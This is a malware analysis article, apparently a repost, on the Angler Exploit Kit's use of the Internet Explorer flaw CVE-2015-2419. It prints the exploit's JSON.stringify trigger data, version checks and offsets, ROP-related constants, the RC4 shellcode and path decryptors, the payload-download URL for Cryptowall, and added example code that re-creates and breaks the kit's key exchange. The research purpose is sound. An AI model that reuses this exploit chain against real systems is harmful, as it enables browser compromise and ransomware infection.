
Angler Exploit Kit (EK) adds support for CVE-2015-2419

程序员文章站 2022-07-03 09:57:08

The Angler Exploit Kit (EK) recently added support for CVE-2015-2419, an Internet Explorer vulnerability that was patched only this July. Weaponising freshly patched bugs quickly has long been the habit of Angler's authors, but since the second half of 2014 their targets had been limited to Adobe Flash Player. CVE-2015-2419 is the second non-Flash exploit Angler has adopted in that time; the first was CVE-2015-1671 in Silverlight. This may be a consequence of the new exploit mitigation Adobe introduced in Flash Player, which stops attackers from using Vector (or similar) objects to take control of a corrupted Flash process. As of now, Angler can pick a Flash, IE or Silverlight exploit according to the target's environment. Angler has also wrapped its IE exploit in a new layer of obfuscation and encryption: every time the landing page runs, it must obtain a key and part of the exploit data from the server before the exploit can execute. That material is only ever sent to the victim side, that is, to a vulnerable browser, and it is protected with XTEA under a home-grown Diffie-Hellman key exchange.

 

Protecting delivery of the IE exploit with a Diffie-Hellman key exchange

 

Angler's landing page is already obfuscated at the HTML and JavaScript level. Once the first layer is removed, the landing page fingerprints the platform, picks the exploit to use and launches it. The IE exploit is obfuscated twice more, and the exploit code is processed differently for every victim machine using a shared key from a Diffie-Hellman (D-H) exchange. The cryptosystem is implemented with the jsbn.js library, which is quite similar to cryptico.js.

 

The victim's browser POSTs JSON like the following to the attacker's server. The naming follows the Diffie-Hellman convention: g is the base, p is the modulus, and A is (g**a_) mod p, where a_ is the victim's secret exponent and must not be disclosed. Little care was taken with the security of these values, however: they are chosen with Math.random, which is not cryptographically secure, they are small, and they are never tested for primality. The value v comes from ScriptEngineBuildVersion(), i.e. the jscript9 build identifier.

 

{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}

 

The attacker replies with the base64-encoded structure shown below. B is the attacker's D-H response, (g**b_) mod p, where b_ is the attacker's secret exponent and never crosses the wire. k is an encrypted copy of the key needed to decrypt b: the attacker encrypts a random key with XTEA under the D-H shared secret s = (A**b_) mod p. The victim decrypts k with XTEA and then uses the result to decrypt b.
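The exchange described above, re-enacted as an added example; this is not code from the kit or from the original article. It plays all three roles (victim POST, server reply, victim decryption) and then the passive attack that the parameter choice invites: an eavesdropper who sees g, p, A, B and k recovers the same key. Assumptions, marked in the code: a toy 17-bit prime modulus P and generator G stand in for the kit's 128-bit, untested Math.random() values; the XTEA key is taken to be the low 128 bits of s as four little-endian words; k is shown as two raw 32-bit words rather than the URL-encoded base64 of the real response. The trial-exponentiation discrete log finishes only because P is tiny; against a real 128-bit unchecked modulus a smarter discrete-log method is needed, but the exchange still hands the attacker everything except the two secret exponents.

```javascript
// Added example, not the kit's code: toy re-enactment of the D-H/XTEA exchange plus a passive attack.
const DELTA = 0x9E3779B9;

// Standard XTEA, 32 cycles; v0/v1 are uint32 words, key is four uint32 words.
function xteaEncryptBlock(v0, v1, key) {
  let sum = 0;
  for (let i = 0; i < 32; i++) {
    v0 = (v0 + ((((v1 << 4) ^ (v1 >>> 5)) + v1) ^ (sum + key[sum & 3]))) >>> 0;
    sum = (sum + DELTA) >>> 0;
    v1 = (v1 + ((((v0 << 4) ^ (v0 >>> 5)) + v0) ^ (sum + key[(sum >>> 11) & 3]))) >>> 0;
  }
  return [v0, v1];
}

function xteaDecryptBlock(v0, v1, key) {
  let sum = (DELTA * 32) >>> 0;
  for (let i = 0; i < 32; i++) {
    v1 = (v1 - ((((v0 << 4) ^ (v0 >>> 5)) + v0) ^ (sum + key[(sum >>> 11) & 3]))) >>> 0;
    sum = (sum - DELTA) >>> 0;
    v0 = (v0 - ((((v1 << 4) ^ (v1 >>> 5)) + v1) ^ (sum + key[sum & 3]))) >>> 0;
  }
  return [v0, v1];
}

// Square-and-multiply modular exponentiation on BigInt.
function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Assumption: the XTEA key is the low 128 bits of the shared secret s, little-endian words.
function keyFromSecret(s) {
  const words = [];
  for (let i = 0n; i < 4n; i++) words.push(Number((s >> (32n * i)) & 0xFFFFFFFFn));
  return words;
}

// Assumption: toy group. The kit's p is a 128-bit Math.random() value never tested for primality.
const P = 104729n;
const G = 5n;

// Mirrors the kit: exponents come from Math.random(), not a CSPRNG.
function randomExponent(p) {
  return BigInt(1 + Math.floor(Math.random() * Number(p - 2n)));
}

// Victim side: the POST body, hex-encoded like the capture above (v is the jscript9 build).
function victimRequest() {
  const a = randomExponent(P);
  const post = { g: G.toString(16), A: modPow(G, a, P).toString(16), p: P.toString(16), v: "17840" };
  return { a, post };
}

// Server side: B = g^b mod p, s = A^b mod p, k = XTEA_s(K) for a fresh random 64-bit K.
function serverResponse(post) {
  const g = BigInt("0x" + post.g), A = BigInt("0x" + post.A), p = BigInt("0x" + post.p);
  const b = randomExponent(p);
  const s = modPow(A, b, p);
  const K = [(Math.random() * 0x100000000) >>> 0, (Math.random() * 0x100000000) >>> 0];
  const reply = { B: modPow(g, b, p).toString(16), k: xteaEncryptBlock(K[0], K[1], keyFromSecret(s)) };
  return { K, reply };
}

// Victim side: s = B^a mod p, then decrypt k.
function victimRecoverKey(a, reply) {
  const s = modPow(BigInt("0x" + reply.B), a, P);
  return xteaDecryptBlock(reply.k[0], reply.k[1], keyFromSecret(s));
}

// Passive attacker: solve A = g^x mod p by trial exponentiation (feasible only for tiny p).
function discreteLogByTrial(g, A, p) {
  let x = 1n;
  for (let e = 0n; e < p; e++) {
    if (x === A) return e;
    x = (x * g) % p;
  }
  return null;
}

// With x in hand the eavesdropper computes s = B^x mod p and decrypts k exactly like the victim.
function eavesdropperRecoverKey(post, reply) {
  const g = BigInt("0x" + post.g), A = BigInt("0x" + post.A), p = BigInt("0x" + post.p);
  const x = discreteLogByTrial(g, A, p);
  const s = modPow(BigInt("0x" + reply.B), x, p);
  return xteaDecryptBlock(reply.k[0], reply.k[1], keyFromSecret(s));
}

// Full run: victim, server and eavesdropper all end up holding the same K.
function runExchange() {
  const { a, post } = victimRequest();
  const { K, reply } = serverResponse(post);
  return { serverKey: K, victimKey: victimRecoverKey(a, reply), attackerKey: eavesdropperRecoverKey(post, reply) };
}
```

runExchange() returns the three copies of K; the point of the example is that attackerKey equals serverKey without knowing either exponent, which is why the "replay protection" described later stops a static analyst but not an attacker who records a live exchange.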

 

{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…"}

 

b holds the constants used by the rest of the exploit (the full set is reproduced in Appendix III). Reaching them takes two levels of indirection, presumably to frustrate static analysis of the exploit as a whole: static analysis can follow the control flow but cannot see the constants. For example, ur0pqm8kx is the passphrase that decodes the shellcode, and stringify is the name of the method invoked on JSON.

 

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"stringify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl":"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III":"clearInterval","lIlI":"ur0pqm8kx",…}

 

 

Without the D-H secret, these exploit files cannot simply be replayed: on every run g, A and p are generated afresh at random, so they will not match the attacker's earlier response. The derived D-H shared secret is therefore wrong, k and b decrypt to garbage, and the exploit never runs. To observe the attack, one would have to:

 

1) break the cryptography
2) break the PRNG
3) run it live against the real server

 

It is not clear why the attacker protects only the constants rather than the whole exploit. Our initial guess is that they simply wanted to avoid unnecessary trouble.

 

CVE-2015-2419 vulnerability details

 

CVE-2015-2419 is a double free in jscript9's native JSON API, patched this July. Specifically, it is triggered when JSON.stringify processes deeply nested JSON data. The full argument the attacker hands to JSON.stringify is given in Appendix IV; the exploit invokes it as follows:

    Il1I4['prototype'].yc = function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        // this.Pc is the nested object from Appendix IV, this.uc the pass-through replacer shown there
        JSON["stringify"](this.Pc, this.uc);
        a.ob(!1);
        // force a garbage collection right after the corrupting call
        CollectGarbage()
    };

 

 

Checking the browser version

 

The exploit depends on specific builds of jscript9.dll. In the decoded JSON response above, each supported jscript9.dll build number maps to a value of its own:

 

"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":4088840}

 

The targeted version range can be confirmed in the following code:

    try {
        var c = a.D["ScriptEngineMajorVersion"](),
            d = a.D["ScriptEngineMinorVersion"](),
            e = a.D["ScriptEngineBuildVersion"](),
            // only jscript9 11.0 up to build 17905 is attacked
            b = c == 11 && d == 0 && e <= 17905;
    } catch (f) {}
    // on a mismatch the build number is carried in the error message
    if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');

 

Shellcode decryption stage

 

The shellcode is embedded in the deobfuscated IE exploit, but in encrypted form; its decryption key is obtained from the decoded JSON response above. For this sample the key is ur0pqm8kx.

 

The decryption routine is given in Appendix II.

 

Payload stage

 

This newest IE exploit is used to deliver the Cryptowall ransomware, which Angler variants have been seen dropping over the past few months. The payload travels over the network in encrypted form. Its download URL is built as follows:

 

url = "https://" + window["location"]["host"] + "/" + base64_decode(a);

Here a comes from the decoded JSON response above; for this sample it is xexec.

 

xexec() is a custom function: it fetches the key from the kit's landing page and decodes the path from which the payload is retrieved.

 

    String['prototype']['xexec'] = function() {
        // decryption_routine is the transposition decryptor of Appendix I, keyed from the landing page
        return decryption_routine(encrypted_path);
    };

encrypted_path lives on the kit's landing page:

 

encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZlFVlVFM0XPV3ThBJPO1I  G 0 Z      tp M 2';

Running it through the decryption routine of Appendix I yields the following base64 data:

 

decrypted_path = 'ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVwd3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPVZ1MVBhV0lFTFlOX3JPMGI2Z0pt';

which decodes to:

 

"father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"

This is the path of the payload.

 

The payload fetched from that path is itself encrypted, so the shellcode decrypts it with XTEA. The XTEA key sits in the deobfuscated HTML page; for this sample it is Du9JOBgkbfzGvmFF.

 

Appendix I

 

This is the decryption routine that recovers the payload path. The key is found on the kit's landing page.

 

    // In the kit this function is assembled with new Function() from a string, and the two
    // method names are spliced in from variables (p and i); for keyArray to hold the column
    // indices used below they have to resolve to push and indexOf, which is what is written here.
    window["osSnUV"] = function (text) {
        var cryptKey = key,                       // key: taken from the landing page
            rawArray = cryptKey.split(''),
            sortArray = cryptKey.split(''),
            keyArray = [];
        sortArray.sort();
        var keySize = sortArray.length;
        // keyArray[i] = position in the key of the i-th smallest key character
        for (var i = 0; i < keySize; i++) {
            keyArray.push(rawArray.indexOf(sortArray[i]));
        }
        // pad the ciphertext with spaces to whole key-sized blocks (always at least one space)
        var k = keySize - text.length % keySize;
        for (var l = 0; l < k; l++) {
            text += ' ';
        }
        var endStr = '', j, line, newLine;
        // permute each block: output column j takes input column keyArray[j]
        for (i = 0; i < text.length; i += keySize) {
            line = text.substr(i, keySize).split('');
            newLine = '';
            for (j = 0; j < keySize; j++) {
                newLine += line[keyArray[j]];
            }
            endStr = endStr + newLine;
        }
        // drop the padding (and any other whitespace)
        endStr = endStr.replace(/\s/g, '');
        return endStr;
    };
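The path recovery of the "Payload stage" section and the routine above, as an added example that is neither the kit's nor the original article's code: the key-driven block transposition written out plainly, together with the matching encryptor the page does not show, so the base64 path from this sample can be encrypted under a key, pushed back through a mirror of the kit's decryptor and base64-decoded to the father.mhtml query string. DEMO_KEY is a hypothetical key; the real one is on the landing page and is not reproduced on this page. Two things the kit's decryptor silently tolerates would corrupt data on the way in, so the encryptor refuses them: repeated key characters (indexOf maps two columns onto one) and whitespace in the plaintext (the decryptor strips it).

```javascript
// Added example, not the kit's code: the Appendix I transposition and its inverse.
const DEMO_KEY = "kW4zQm9a";   // hypothetical key, chosen for the demo

// Column order exactly as the routine derives it: sort the key's characters and record
// where each sorted character sits in the original key (indexOf takes the first match).
function keyPermutation(key) {
  const raw = key.split("");
  return key.split("").sort().map((ch) => raw.indexOf(ch));
}

// Mirror of Appendix I: pad with spaces (always at least one), permute each key-sized
// block so that output column j takes input column perm[j], then strip all whitespace.
function transposeDecrypt(text, key) {
  const perm = keyPermutation(key);
  const n = perm.length;
  text += " ".repeat(n - (text.length % n));
  let out = "";
  for (let i = 0; i < text.length; i += n) {
    const block = text.substr(i, n);
    for (let j = 0; j < n; j++) out += block[perm[j]];
  }
  return out.replace(/\s/g, "");
}

// Inverse: plaintext column j of each block lands in ciphertext column perm[j].
function transposeEncrypt(plain, key) {
  if (new Set(key).size !== key.length) throw new Error("key characters must be unique");
  if (/\s/.test(plain)) throw new Error("plaintext must not contain whitespace");
  const perm = keyPermutation(key);
  const n = perm.length;
  plain += " ".repeat((n - (plain.length % n)) % n);   // space padding, as the decryptor expects
  let out = "";
  for (let i = 0; i < plain.length; i += n) {
    const block = plain.substr(i, n);
    const cols = new Array(n);
    for (let j = 0; j < n; j++) cols[perm[j]] = block[j];
    out += cols.join("");
  }
  return out;
}

// The base64 string Appendix I yields for the sample on this page.
const DECRYPTED_PATH =
  "ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVw" +
  "d3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPV" +
  "Z1MVBhV0lFTFlOX3JPMGI2Z0pt";

// Second stage of the path recovery: base64 decode (Node's Buffer; atob() in a browser).
function decodePath(b64) {
  return Buffer.from(b64, "base64").toString("latin1");
}

// Ciphertext in, payload path out: the kit's decryptor followed by the base64 decode.
function recoverPath(cipherText, key) {
  return decodePath(transposeDecrypt(cipherText, key));
}

// Encrypt the page's base64 path under the demo key and recover it again.
function demo() {
  const cipherText = transposeEncrypt(DECRYPTED_PATH, DEMO_KEY);
  return { cipherText, path: recoverPath(cipherText, DEMO_KEY) };
}
```

demo().path is the father.mhtml query string quoted in the "Payload stage" section; with a different key the same plaintext yields a different column order, which is why the key has to come from the landing page alongside the ciphertext.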

 

 

Appendix II

 

The RC4 decryption routine used to recover the shellcode:

function DecryptionRoutine(key, encrypted_shellcode) {
    var d = [], e = 0, f, h, decrypted_shellcode = '';
    // key-scheduling: identity permutation, then swap driven by the key bytes
    for (h = 0; h < 256; h++)
    {
        d[h] = h;
    }
    for (h = 0; h < 256; h++)
    {
        e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
        f = d[h];
        d[h] = d[e];
        d[e] = f;
    }
    // keystream generation, XORed byte by byte into the ciphertext
    for (var k = e = h = 0; k < encrypted_shellcode.length; k++)
    {
        h = (h + 1) % 256;
        e = (e + d[h]) % 256;
        f = d[h];
        d[h] = d[e];
        d[e] = f;
        decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
    }
    return decrypted_shellcode;
}

 

 

Appendix III

 

The contents of the constant b:

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"stringify","lII":"location","II":"host",
"llI":"number","lll":"ScriptEngineBuildVersion","lIl":"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval",
"III":"clearInterval","lIlI":"ur0pqm8kx","IlII":"https://","lllI":"/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP",
"IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect",
"IIIlI":11,"lIIll":0,"lllll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,
"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,
"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":16776960,"IlIIl":16777215,"llllI":4294967040,
"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"llllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,
"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,
"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,
"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,
"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,
"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll":7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,
"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],
"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542],
"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476],
"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl":90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,
"llIIIl":1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,
"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":4088840

 

 

Appendix IV

 

The argument the attacker chose for JSON.stringify in order to trigger CVE-2015-2419 (eight levels of nesting, twenty keys per level), followed by the replacer passed as its second argument:

 

Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM",
"a10":"6YCTSRH0","a11":"N0AJ34YX","a12":"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR","a18":"356Q7028","a19":"8136URQ8"},
"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV","a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78",
"a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77","a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},
"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS","a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X","a10":"B3AIE208",
"a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2","a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},
"a1":"7P0RT015","a2":"IQPV6IKK","a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9":"6W4HEW6L","a10":"2C182X5P",
"a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15":"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},
"a1":"R88W7ICS","a2":"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF",
"a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14":"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
"a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8","a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM",
"a11":"1M6IX20K","a12":"X64LGJKK","a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783","a19":"0T08F051"},
"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40","a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y",
"a11":"N04O0IC8","a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},
"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4":"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10":"HP3C3671",
"a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4","a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"};

// replacer passed to JSON.stringify: returns every value unchanged
uc = function (a, b) {
        return b
    }